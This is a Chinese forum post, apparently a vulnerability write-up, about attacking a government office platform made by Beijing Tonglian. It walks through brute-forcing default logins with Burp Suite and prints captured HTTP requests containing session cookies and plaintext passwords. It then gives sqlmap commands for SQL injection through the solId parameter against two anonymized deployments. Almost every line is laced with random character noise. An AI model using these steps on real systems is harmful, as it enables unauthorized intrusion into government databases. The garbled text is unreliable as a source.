|
8 O' N. c" Y. `, {% @; h1 N/ C
9 o5 x! V* ]4 V& @% W4 B ; ?9 z- L5 L" H% w O
5 S, j) z/ v9 G5 V6 ? 平台简介:
2 [6 q. T# V: D# H, O
; r/ I' h; G9 O E7 ]4 s/ W4 A- I3 K* W& I7 p$ b
{& ^# R/ Q& C9 j' P
/ c2 J0 h( ]1 `8 l) }- a8 N: w: ]
8 V" C& \# M0 O" z) K, H 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 W% o$ Q+ \: F1 T; q7 A* D- J* N同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
, Q% Y/ R: |& J5 R
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
* Q. g2 \0 m& R! B- ]5 B7 e# S
2 [3 ]3 p& Z- A% ]- |" d) s& w+ Y) o( _9 k/ \
0 y+ v# h/ v0 U; a+ L( b
& ~) r# M" k( B2 t1 n' i
5 m1 t7 M4 h# H 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:0 R& d( m6 D6 [4 ^3 ~, e" v( b
. N& @ @& D4 U) V, j; j8 R7 G, z. y9 I# d
( [1 w+ r' j4 Z; C; v
6 q* h3 ^; e4 q3 C1 J, U* [
0 A) t. U- X$ A3 [3 l$ l http://1.1.1.1:7197/cap-aco/#(案例2-)
" f0 T/ l% r+ f4 `" }: I9 l 3 y+ K4 O4 u1 u( _
X7 X& X. k9 H, x: \
http://www.XXOO.com (案例1-官网网站)
) u$ z( c v0 V
$ {, U! r% ^0 j/ H$ A3 F; g" W; \7 {
) g' o' B- D- v9 ^ 1 g! z. C/ `4 a- b
5 K. c3 n& s3 i+ H" t
8 `' m8 d# y, w7 Z6 k 漏洞详情:
/ I8 N* [2 _, K4 k * {1 m3 {/ x1 d, l# S+ G- ?) ]
% Y2 A/ E/ y: f$ h1 w" J. g 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
% A, L$ _; B* B+ w* d 7 \0 w8 R8 f' ~0 j) K
1 r4 t8 R! T( ?. Z6 y* J 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:7 P, M( t, A5 p+ g
8 ^! B6 G3 h( U( y8 M3 Q3 o' L9 _5 b7 t& g) E( f4 A& O% h- H
2 c8 O+ X7 v. w
5 G0 j$ m7 r0 B2 c0 d: B9 w
* R. }+ U" L* T' j- j" S" V$ ? t 
' S/ r8 h) ?2 U
' f, B6 W6 V9 C' ]0 g0 W
. l* e( Z; q% q# z status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:, n$ g4 }! W) Q5 O, B$ E9 K2 I
! F. K- t8 v( R8 D, b4 k! g' w2 `
8 `; l" E4 s8 [) X; ]7 G+ w4 e 1、案例1-官方网站: A; q2 g. h) L, {) C
% C. O# Y% h0 e, j& x* H
( X+ t" C4 Z; p' H2 e" @ GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.10 X8 \7 w! r+ N! h8 d( r
v Y* {+ b4 f" W
4 n: q7 k5 e" q' u% w/ s( t6 q
Host: www.XXOO.com, ? E3 ?0 o1 U, u4 v) v$ e; \+ \
2 M- p! `' O8 j q, w6 q+ q) ?; R6 Q, ?9 d' l$ d
Proxy-Connection: Keep-Alive0 U& K5 u& u5 A/ O/ l
3 s1 a! o6 Q# x& l2 ?3 j
. B3 f& Y/ H; E: |, C s Accept: application/json, text/javascript, */*; q=0.012 v- p8 d9 P h+ d; w: Z
! J1 W, [# S! h
2 Q' H: @ m1 ~: S
Accept-Language: zh-CN) i& t0 K" P( }! c
) k9 s7 [0 n7 s* h& v, D8 y+ n) [2 C8 A$ x; Y
Content-Type: application/json
5 z. m0 W& M- o5 q9 ?" ^ V
0 [7 e) @" y; f2 y& K- `2 n. E* X* a1 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
. A3 n! @# v9 P3 W5 f& t - P( n+ c( Q6 [
# t' h7 p1 E! Y0 H! W( H k1 m X-Requested-With: XMLHttpRequest
8 ], x9 b9 y9 j: Z1 d/ ` R# w4 ? . T; Y( G5 H. X$ i
# I' N& {% ?- o: b& c* }) e Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
: x- a4 l$ G# `3 v' m% L4 m
! f8 B( f, }- G. d3 T: L: Z! P, h+ j7 t) v
Accept-Encoding: gzip, deflate, sdch1 G7 I. Y0 h; F) c2 A" h
% [/ s5 P+ i, i, X7 M
5 L9 O& u0 N+ W A) ] Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e" S) p4 O, U9 ~! y5 [
6 l t9 W! u# e/ ]0 ~# q0 s+ i
: A! e+ x4 W o: V 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 T" c# y2 y G0 ^7 y
7 P! {" s8 X5 \' Y
! b( e2 T' ^" X& ?, z. c
1 F, k- d$ I( ~+ F! Q# O7 |& V
4 g2 e9 {' G; X
+ B5 G- ?; G9 `  7 p: T- j2 }) Y& B: w
) q& y* K" k* t& Y5 Y* J
: J6 ?* b6 R; G: j/ P
( u0 u8 _7 E Q) a% {3 I4 b
& f% `% S+ v* L, r& X% M9 Z a# ]9 H. w+ M
: n: U$ h2 X' C" o3 ?
5 L0 R1 `5 J2 G; n8 \
1 D) j8 O$ Y4 @, S/ n6 t* ]2 x
& X" K f6 Y1 p8 Y, y+ [
: n0 m0 _* |# j
; i# r' ? e$ x 2、案例2-某天河云平台
: i9 z+ q1 v% s " G3 x9 k( u$ w8 j
0 t- E: k9 N: M: Y: `9 M% L
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
. j" W3 f2 t' t/ o1 F2 d& D8 N2 M4 I $ H4 c- f7 v) L4 p
" j# `7 M* U3 a: G& q
Host: 1.1.1.:7197+ k2 }; S$ V1 ?2 u
* {- S8 }5 x2 c e& T+ ?
3 f! S& K9 E# P: x4 t: Q
Accept: application/json, text/javascript, */*; q=0.01
' e- P, u. Y0 P1 E
5 @7 T5 f. I# I" F) w; w( G7 Q" g1 ~& L4 X
X-Requested-With: XMLHttpRequest
0 c* S9 }9 w, l6 K( O& {0 {+ R
- `0 \1 I( A2 g0 @0 n* p* _% H5 x. w5 p& Q0 v, }: k9 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0! x' w; W' S$ C) m6 t q: z
! a6 w/ h9 a) }, q* J
! n( G$ b7 j' n' h Content-Type: application/json
: |: F- I' N& N" x, W ) d3 y) P* X4 j
( G* x- |9 e7 Q0 ~5 r/ l$ X# F4 A Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
- @* K8 A+ | d; i- m" c
# O1 Y5 z1 W+ v& _5 H5 U& _0 L9 X w; L
Accept-Language: zh-CN,zh;q=0.8
A! Z# M7 g) G) j% o4 E 1 i& C1 s+ @8 a2 C* F& i$ |5 c
0 A& m% X) q( s1 S8 s s/ l
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1* N8 W3 Y% B9 i0 |4 q
; s$ i: y4 W: Q% `2 P+ K
- G4 T+ `. Z% ]6 q
Connection: close
* X& T9 m0 m9 h+ C
% V p+ J! ~1 G% E+ o& `% ~ R& n2 O k6 d
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 Q: M9 V; Z/ A+ O# J
3 X0 N# @$ R2 U1 @" o- I& X+ E, o. |5 }
1 ?' Q: s( i/ q ?) [
6 U, V' b( K- R2 e 3 w, p2 u' U: e @; |1 P/ w
% L! Q2 P1 U A( y9 E* V8 ?, i2 I
7 H# j6 F- o( d
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对